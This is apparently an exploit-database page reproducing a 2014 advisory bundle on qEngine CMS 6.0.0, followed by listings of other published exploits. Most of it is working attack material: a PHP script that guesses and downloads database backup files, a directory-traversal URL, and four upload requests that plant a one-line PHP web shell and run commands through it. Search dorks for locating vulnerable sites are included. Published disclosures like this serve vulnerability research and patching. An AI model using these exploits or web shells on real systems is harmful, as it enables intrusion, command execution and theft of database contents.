"qEngine CMS 6.0.0 - Multiple Vulnerabilities"

Author

Exploit author

LiquidWorm

Platform

Exploit platform

php

Release date

Exploit published date

2014-03-25

                
                    
                         Download file
                    
                
            
<?php

/*

qEngine CMS 6.0.0 Database Backup Disclosure Exploit


Vendor: C97net
Product web page: http://www.c97.net
Affected version: 6.0.0 and 4.1.6

Summary: qEngine (qE) is a lightweight, fast, yet feature packed
CMS script to help you building your site quickly. Using template
engine to separate the php codes from the design, you don't need
to touch the codes to design your web site. qE is also expandable
by using modules.

Desc: qEngine CMS stores database backups using the Backup DB tool
with a predictable file name inside the '/admin/backup' directory
as 'Full Backup YYYYMMDD.sql' or 'Full Backup YYYYMMDD.gz', which
can be exploited to disclose sensitive information by downloading
the file. The '/admin/backup' is also vulnerable to directory listing
by default.


Tested on: Apache/2.4.7 (Win32)
           PHP/5.5.6
           MySQL 5.6.14


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5172
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5172.php


Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net



07.03.2014

*/


error_reporting(0);

function status($done, $total, $size=20)
{
	static $start_time;
 	if($done > $total) return;
 	if(empty($start_time)) $start_time=time();

	$now = time();
 	$perc=(double)($done/$total);
 	$bar=floor($perc*$size);

 	$disp=number_format($perc*100, 0);
 
	$status_bar="\r $disp% [";
	$status_bar.=str_repeat("=", $bar);
	if($bar<$size)
	{
		$status_bar.=">";
		$status_bar.=str_repeat(" ", $size-$bar);
	} else
		{
			$status_bar.="=";
		}
 	
 	$status_bar.="] $done/$total";
 
	$rate = ($now-$start_time)/$done;
	$left = $total - $done;
	$eta = round($rate * $left, 2);
	$elapsed = $now - $start_time;
 
	$status_bar.= " remaining: ".number_format($eta)." sec. elapsed: ".number_format($elapsed)." sec.";
 
	echo "$status_bar ";
	flush();
 
	if($done == $total)
	{
		echo "\n";
	}
}

print "
 @---------------------------------------------------------------@
 |                                                               |
 |      qEngine CMS 6.0.0 Database Backup Disclosure Exploit     |
 |                                                               |
 |                                                               |
 |              Copyleft (c) 2014, Zero Science Lab              |
 |                                                               |
 |                   Advisory ID: ZSL-2014-5172                  |
 |                       www.zeroscience.mk                      |
 |                                                               |
 @---------------------------------------------------------------@
	  ";

if ($argc < 4)
{
    print "\n\n [+] Usage: php $argv[0] <host> <port> <dirname>\n\n";
    print " [+] Example: php $argv[0] zeroscience.mk 80 hercules\n\n";
    die();
}

$godina_array = array('2014','2013','2012','2011','2010');

$mesec_array = array('12','11','10','09',
					 '08','07','06','05',
					 '04','03','02','01');

$dn_array = array('31','30','29','28','27','26',
				  '25','24','23','22','21','20',
	  			  '19','18','17','16','15','14',
				  '13','12','11','10','09','08',
	  			  '07','06','05','04','03','02',
	  			  '01');

$host = $argv[1];
$port = intval($argv[2]);
$path = $argv[3];
$dbnm = "Full%20Backup%20";

$alert1 = "\033[1;31m";
$alert2 = "\033[0;37m";
$alert3 = "\033[1;32m";

echo "\n [*] Running checks:\n\n";

foreach($godina_array as $godina)
{
	foreach($mesec_array as $mesec)
	{
		$x++;
		status($x, 58);
		foreach($dn_array as $dn)
		{
			$ext=".gz";
			if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext))
			{
				echo "\n";
				echo $alert1;
				print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n";
				echo $alert2;
				print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n";
				print " Full URL:\x20";
				echo $alert3;
				die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n");
			}
			$ext=".sql";
			if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext))
			{
				echo "\n";
				echo $alert1;
				print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n";
				echo $alert2;
				print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n";
				print " Full URL:\x20";
				echo $alert3;
				die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n");
			}
		}
	}
}

print "\n\n [*] Zero findings!\n\n\n";

?>

#######################################################################################


qEngine CMS 6.0.0 (task.php) Local File Inclusion Vulnerability


Vendor: C97net
Product web page: http://www.c97.net
Affected version: 6.0.0 and 4.1.6

Summary: qEngine (qE) is a lightweight, fast, yet feature packed
CMS script to help you building your site quickly. Using template
engine to separate the php codes from the design, you don't need
to touch the codes to design your web site. qE is also expandable
by using modules.

Desc: qEngine CMS suffers from an authenticated file inclusion
vulnerability (LFI) when input passed thru the 'run' parameter to
task.php is not properly verified before being used to include files.
This can be exploited to include files from local resources with
directory traversal attacks.


Tested on: Apache/2.4.7 (Win32)
           PHP/5.5.6
           MySQL 5.6.14


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5173
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5173.php


Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net



07.03.2014

---


http://localhost/qe6_0/admin/task.php?run=../../../../../../windows/win.ini

#########################################################################﻿


qEngine CMS 6.0.0 Remote Code Execution


Vendor: C97net
Product web page: http://www.c97.net
Affected version: 6.0.0 and 4.1.6

Summary: qEngine (qE) is a lightweight, fast, yet feature packed
CMS script to help you building your site quickly. Using template
engine to separate the php codes from the design, you don't need
to touch the codes to design your web site. qE is also expandable
by using modules.

Desc: qEngine CMS suffers from an authenticated arbitrary code
execution. The vulnerability is caused due to the improper verification
of uploaded files in several modules thru several POST parameters.
This can be exploited to execute arbitrary PHP code by uploading
a malicious PHP script file that will be stored in '/public/image'
directory. Minimum permissions needed for a user to upload any file:

User level: Regular (param: user_level=1)
Admin level: Editor (param: admin_level=3)

Only the 'Super Admin' level makes the Tool 'File Manager' available.


Tested on: Apache/2.4.7 (Win32)
           PHP/5.5.6
           MySQL 5.6.14


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5174
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5174.php


Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net



07.03.2014

---


 #1 (Modules > qBanner > Manage Banner > Add Entry)

POST http://localhost/qe6/admin/task.php?mod=qbanner&run=edit.php& HTTP/1.1


-----------------------------225222869427624
Content-Disposition: form-data; name="AXSRF_token"

52e9c9ff9bb251a144b82a662496f5b8
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_cmd"

new
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_process"

1
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_savenew"

0
-----------------------------225222869427624
Content-Disposition: form-data; name="primary_key"

page_id
-----------------------------225222869427624
Content-Disposition: form-data; name="primary_val"

dummy
-----------------------------225222869427624
Content-Disposition: form-data; name="page_image"; filename="shell.php"
Content-Type: application/octet-stream

<?php passthru($_GET['cmd']); ?>
-----------------------------225222869427624
Content-Disposition: form-data; name="page_title"

ZSL
-----------------------------225222869427624
Content-Disposition: form-data; name="page_keyword"

http://www.zeroscience.mk
-----------------------------225222869427624
Content-Disposition: form-data; name="group_id"

QBANR
-----------------------------225222869427624
Content-Disposition: form-data; name="page_body"

This page is part of qBanner module. Please use qBanner Manager to edit this page.
-----------------------------225222869427624
Content-Disposition: form-data; name="page_allow_comment"

-----------------------------225222869427624
Content-Disposition: form-data; name="page_list"

-----------------------------225222869427624--


Upload location: http://localhost/qe6/public/image/
Exec: http://localhost/qe6/public/image/shell.php?cmd=whoami




 #2 (Tools > File Manager > Upload)

POST http://localhost/qe6/admin/fman/upload_process.php HTTP/1.1


-----------------------------76802486520945
Content-Disposition: form-data; name="chdir"

-----------------------------76802486520945
Content-Disposition: form-data; name="n"

5
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_1"; filename="shell.php"
Content-Type: application/octet-stream

<?php passthru($_GET['cmd']); ?>
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_2"; filename=""
Content-Type: application/octet-stream

-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_3"; filename=""
Content-Type: application/octet-stream

-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_4"; filename=""
Content-Type: application/octet-stream

-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_5"; filename=""
Content-Type: application/octet-stream

-----------------------------76802486520945--


Upload location: Anywhere within the webroot folder and its subfolders.
Exec: http://localhost/qe6/shell.php?cmd=whoami




 #3 (Modules > Slideshow > Manage Slides > Add Entry)

POST http://localhost/qe6/admin/task.php?mod=slideshow&run=edit.php& HTTP/1.1


-----------------------------23201806221528
Content-Disposition: form-data; name="AXSRF_token"

52e9c9ff9bb251a144b82a662496f5b8
-----------------------------23201806221528
Content-Disposition: form-data; name="qadmin_cmd"

new
-----------------------------23201806221528
Content-Disposition: form-data; name="qadmin_process"

1
-----------------------------23201806221528
Content-Disposition: form-data; name="qadmin_savenew"

0
-----------------------------23201806221528
Content-Disposition: form-data; name="primary_key"

page_id
-----------------------------23201806221528
Content-Disposition: form-data; name="primary_val"

dummy
-----------------------------23201806221528
Content-Disposition: form-data; name="page_image"; filename="shell.php"
Content-Type: application/octet-stream

<?php passthru($_GET['cmd']); ?>
-----------------------------23201806221528
Content-Disposition: form-data; name="page_title"

ZSL
-----------------------------23201806221528
Content-Disposition: form-data; name="page_keyword"

http://www.zeroscience.mk
-----------------------------23201806221528
Content-Disposition: form-data; name="group_id"

SSHOW
-----------------------------23201806221528
Content-Disposition: form-data; name="page_body"

This page is part of SlideShow module. Please use SlideShow Manager to edit this page.
-----------------------------23201806221528
Content-Disposition: form-data; name="page_allow_comment"

-----------------------------23201806221528
Content-Disposition: form-data; name="page_list"

-----------------------------23201806221528--


Upload location: http://localhost/qe6/public/image/
Exec: http://localhost/qe6/public/image/shell.php?cmd=whoami




 #4 (Contents > Manage Categories > Add Entry)

POST http://localhost/qe6/admin/page_cat.php? HTTP/1.1


-----------------------------205172563220150
Content-Disposition: form-data; name="AXSRF_token"

3afa0c7483889ac54d7b6afa4083a9a2
-----------------------------205172563220150
Content-Disposition: form-data; name="qadmin_cmd"

new
-----------------------------205172563220150
Content-Disposition: form-data; name="qadmin_process"

1
-----------------------------205172563220150
Content-Disposition: form-data; name="qadmin_savenew"

0
-----------------------------205172563220150
Content-Disposition: form-data; name="primary_key"

idx
-----------------------------205172563220150
Content-Disposition: form-data; name="primary_val"

dummy
-----------------------------205172563220150
Content-Disposition: form-data; name="group_id"

GENPG
-----------------------------205172563220150
Content-Disposition: form-data; name="parent_id"

1
-----------------------------205172563220150
Content-Disposition: form-data; name="cat_name"

ZSL
-----------------------------205172563220150
Content-Disposition: form-data; name="permalink"

-----------------------------205172563220150
Content-Disposition: form-data; name="cat_details"

<p>Zero Science Lab</p>
-----------------------------205172563220150
Content-Disposition: form-data; name="cat_image"; filename="shell.php"
Content-Type: application/octet-stream

<?php passthru($_GET['cmd']); ?>
-----------------------------205172563220150--


Upload location: http://localhost/qe6/public/image/
Exec: http://localhost/qe6/public/image/shell.php?cmd=whoami

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting"	webapps	php	"Hemant Patidar"
2020-12-02	"WordPress Plugin Wp-FileManager 6.8 - RCE"	webapps	php	"Mansoor R"
2020-12-02	"WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution"	webapps	php	zetc0de
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Simple College Website 1.0 - 'page' Local File Inclusion"	webapps	php	Mosaaed
2020-12-02	"Car Rental Management System 1.0 - SQL Injection / Local File include"	webapps	php	Mosaaed
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Pharmacy Store Management System 1.0 - 'id' SQL Injection"	webapps	php	"Aydın Baran Ertemir"
2020-12-02	"WonderCMS 3.1.3 - Authenticated Remote Code Execution"	webapps	php	zetc0de
2020-12-01	"Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS"	webapps	php	yunaranyancat

Release Date	Title	Type	Platform	Author
2020-11-05	"iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation"	webapps	hardware	LiquidWorm
2020-11-05	"iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)"	webapps	hardware	LiquidWorm
2020-11-05	"iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass"	webapps	hardware	LiquidWorm
2020-10-27	"TDM Digital Signage PC Player 4.1 - Insecure File Permissions"	local	windows	LiquidWorm
2020-10-27	"GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse"	remote	hardware	LiquidWorm
2020-10-27	"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root"	remote	hardware	LiquidWorm
2020-10-26	"ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure"	webapps	hardware	LiquidWorm
2020-10-26	"ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)"	webapps	hardware	LiquidWorm
2020-10-26	"ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service"	webapps	hardware	LiquidWorm
2020-10-26	"ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure"	webapps	hardware	LiquidWorm
2020-10-07	"BACnet Test Server 1.01 - Remote Denial of Service (PoC)"	dos	windows	LiquidWorm
2020-10-01	"SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure"	webapps	hardware	LiquidWorm
2020-10-01	"SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin)"	webapps	hardware	LiquidWorm
2020-10-01	"BrightSign Digital Signage Diagnostic Web Server 8.2.26 - File Delete Path Traversal"	webapps	hardware	LiquidWorm
2020-10-01	"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow"	remote	hardware	LiquidWorm
2020-10-01	"SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration"	webapps	hardware	LiquidWorm
2020-10-01	"BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated)"	webapps	hardware	LiquidWorm
2020-09-25	"B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure"	webapps	multiple	LiquidWorm
2020-09-25	"B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)"	webapps	multiple	LiquidWorm
2020-09-21	"B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution"	webapps	multiple	LiquidWorm
2020-09-14	"Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path"	local	windows	LiquidWorm
2020-08-28	"Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation"	webapps	hardware	LiquidWorm
2020-08-26	"Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal"	webapps	multiple	LiquidWorm
2020-08-24	"Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass"	webapps	hardware	LiquidWorm
2020-08-24	"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure"	webapps	hardware	LiquidWorm
2020-08-17	"QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure"	webapps	hardware	LiquidWorm
2020-08-17	"QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)"	webapps	hardware	LiquidWorm
2020-08-17	"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion"	webapps	hardware	LiquidWorm
2020-08-17	"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure"	webapps	hardware	LiquidWorm
2020-08-07	"All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)"	webapps	hardware	LiquidWorm

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"qEngine CMS 6.0.0 - Multiple Vulnerabilities"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.